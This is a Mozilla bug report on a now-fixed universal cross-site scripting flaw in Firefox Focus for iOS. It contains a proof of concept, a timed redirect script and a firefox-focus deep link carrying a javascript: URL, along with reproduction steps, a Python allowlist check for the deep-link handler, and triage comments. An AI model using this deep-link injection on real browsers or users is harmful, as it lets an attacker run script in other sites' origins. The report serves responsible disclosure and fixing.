Full UXSS via opening Firefox Focus externally after silent background navigation
Categories
(Focus :: Security: iOS, defect)
Tracking
(firefox123 fixed)
| | Tracking | Status |
|---|---|---|
| firefox123 | --- | fixed |
People
(Reporter: proof131072, Unassigned)
Details
(Keywords: csectype-sop, reporter-external, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(5 files)
We are able to achieve Full UXSS by calling iOS Firefox Focus externally after silent background navigation.
PoC:
https://pwning.click/googleloc.php (Open in Firefox Focus and leave the browser; the last thing the user has seen is only https://pwning.click/googleloc.php)
<script>setTimeout(function() {location="https://google.com"}, 3000);</script>
https://pwning.click/focuslink.php (Open with other browsers/apps like iOS Chrome)
<a href="firefox-focus://open-url?url=javascript:document.write(document.domain)">Open with Firefox Focus</a>
This is all possible (Full UXSS) because iOS Firefox Focus allows silent background navigation while the user has left the browser.
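The deep-link handler is where this chain can be cut: whatever page the backgrounded tab has silently navigated to, the `url` parameter of `open-url` must never be allowed to carry a `javascript:` URL into that tab. The following Python model of that check is an added example, not code from the Focus project or from its fix; it assumes the `firefox-focus://open-url?url=...` link format quoted in the PoC and uses an http/https allowlist rather than a denylist, so case or percent-encoding tricks on the scheme fail closed.

```python
from urllib.parse import parse_qs, urlsplit

# Schemes a deep link may hand to the browser tab. Everything else
# (javascript:, data:, file:, an empty or mangled scheme) is refused, so no
# denylist of "javascript" is needed and none can be bypassed by case or
# percent-encoding games on the scheme.
ALLOWED_SCHEMES = {"http", "https"}


def extract_open_url(deep_link: str):
    """Return the ``url`` parameter of a firefox-focus://open-url?url=... link,
    or None if the link is not of that form (format assumed from the PoC)."""
    parts = urlsplit(deep_link)
    if parts.scheme != "firefox-focus" or parts.netloc != "open-url":
        return None
    # parse_qs percent-decodes the value exactly once, as the app would.
    values = parse_qs(parts.query, keep_blank_values=True).get("url")
    return values[0] if values else None


def is_allowed_target(url: str) -> bool:
    """Allowlist check on the already-decoded target URL.

    urlsplit only recognises a scheme made of [A-Za-z0-9+-.], so a
    double-encoded 'java%73cript:' yields an empty scheme and is rejected."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return scheme in ALLOWED_SCHEMES


def handle_deep_link(deep_link: str):
    """Decide what the app should do with an externally supplied deep link.

    Returns ("open", url) only for an http(s) target; anything else is
    ("reject", reason) and must never reach the current tab's JS context."""
    target = extract_open_url(deep_link)
    if target is None:
        return ("reject", "not an open-url deep link or url parameter missing")
    if not is_allowed_target(target):
        return ("reject", f"scheme not allowed: {target[:40]!r}")
    return ("open", target)


if __name__ == "__main__":
    # Constructed sample links: a benign target and the PoC's javascript: case.
    for link in (
        "firefox-focus://open-url?url=https%3A%2F%2Fexample.com%2Fpage",
        "firefox-focus://open-url?url=javascript:document.write(document.domain)",
        "firefox-focus://open-url?url=JavaScript%3Aalert(document.domain)",
    ):
        print(link, "->", handle_deep_link(link))
```

Scheme-less input such as `example.com` is also rejected here rather than guessed as https; a real handler that wants to accept it should normalise first and then run the same allowlist check.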
Comment 2•11 months ago
This is similar to Firefox iOS bug https://bugzilla.mozilla.org/show_bug.cgi?id=1850158
Is that running a javascript URI with a firefox URI? That doesn't become UXSS on Firefox, but it does become Full UXSS on Focus, which is a very serious issue.
Please check this Apple default mail app case too: https://pwning.click/RPReplay_Final1705153539.mp4
Hi Nish, please confirm that your fix PR 3973 https://github.com/mozilla-mobile/focus-ios/pull/3973 for https://pwning.click/focuslink.php on https://bugzilla.mozilla.org/show_bug.cgi?id=1860075#c10 is identical to this 1863831 report: https://pwning.click/focuslink.php
Here's a summary from the above comment and links. Could you confirm this is accurate :james?
Steps to reproduce
- Navigate to https://pwning.click/googleloc.php
- Leave the Focus application (by moving it to the background)
- Open Safari
- Navigate to https://pwning.click/focuslink.php in Safari
- Click on the link "Open with Firefox Focus"
Actual behavior
Focus is opened and JavaScript is running
Expected behavior
Focus is opened and JavaScript should not be running
Yeah, that's correct; this has the same steps as the one Nish told Andrei: https://bugzilla.mozilla.org/show_bug.cgi?id=1860075#c14
Thanks for confirming!
We can now close this report so the new one Andrew added for See Also which is https://bugzilla.mozilla.org/show_bug.cgi?id=1876851 can also be tracked correctly in the future. Thanks!
Ok, I'll mark it as a duplicate of 1876851 so we keep only one bug open for the STR listed here.
Comment 11•8 months ago (Reporter)
Thanks, but I believe this should be marked as resolved not duplicate due to https://github.com/mozilla-mobile/focus-ios/commit/0ecc6ed809a65c408c2216b9fe45abf9185f96eb for v122.
Ok I can make that change
Comment 15•8 months ago
Hey, sorry for the hassle, but could you update the tracking flags to indicate which version it was fixed in? It helps us with bookkeeping. Thank you!
Comment 17•8 months ago
Putting the needinfo back: looks like it was inadvertently removed when the advisory attachment was added. I suppose the advisory implies this was fixed in v123? It would still be nice to update the status flags to say that explicitly
Yes it was for v123! Hopefully I marked the right fields in the ticket here
Comment 19•8 months ago (Reporter)
This is supposed to be fixed on v122 https://github.com/mozilla-mobile/focus-ios/pull/3973
Ah sorry James you're right! Let me adjust this.
Comment 21•7 months ago (Reporter)
No worries, thanks!
Comment 22•7 months ago
status-firefox123: fixed is true, even if it's not the first version that was fixed. Unfortunately, we can't set the older fields as they get made read-only in Bugzilla to reduce clutter.
Comment 23•7 months ago
This one is less universal than the previous one (involves user interaction with the other app) but still a valid UXSS